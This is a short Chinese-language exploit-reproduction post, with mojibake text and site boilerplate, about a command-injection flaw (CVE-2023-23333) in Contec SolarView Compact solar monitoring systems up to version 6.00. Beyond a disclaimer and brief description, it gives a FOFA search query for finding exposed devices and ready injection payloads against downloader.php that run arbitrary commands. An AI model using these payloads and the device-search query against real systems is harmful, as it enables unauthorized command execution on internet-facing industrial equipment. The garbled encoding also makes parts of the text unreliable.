免責(zé)聲明
技術(shù)文章僅供參考,任何個(gè)人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守公共秩序,尊重社會(huì)公德,不得利用網(wǎng)絡(luò)從事危害國家安全、榮譽(yù)和利益,未經(jīng)授權(quán)請(qǐng)勿利用文章中的技術(shù)資料對(duì)任何計(jì)算機(jī)系統(tǒng)進(jìn)行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失,均由使用者本人負(fù)責(zé)。本文所提供的工具僅用于學(xué)習(xí),禁止用于其他?。?!
漏洞說明
Contec SolarView Compact是日本Contec公司的一個(gè)應(yīng)用系統(tǒng),提供光伏發(fā)電測量系統(tǒng)。SolarView Compact 6.00以下存在命令注入漏洞,攻擊者可以通過downloader.php繞過內(nèi)部限制執(zhí)行命令。
攻擊者可通過該漏洞在服務(wù)器端任意執(zhí)行代碼,獲取服務(wù)器權(quán)限。
影響版本
SolarView Compact <= 6.00
漏洞復(fù)現(xiàn)文章來源:http://www.zghlxwxcb.cn/news/detail-555819.html
fofa:body="SolarView Compact" && title="Top"
payload:文章來源地址http://www.zghlxwxcb.cn/news/detail-555819.html
/downloader.php?file=%3B{cmd}|rev%00.zip
GET /downloader.php?file=%3Bid|
到了這里,關(guān)于漏洞復(fù)現(xiàn) || SolarView Compact 存在任意命令執(zhí)行漏洞(CVE-2023-23333)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!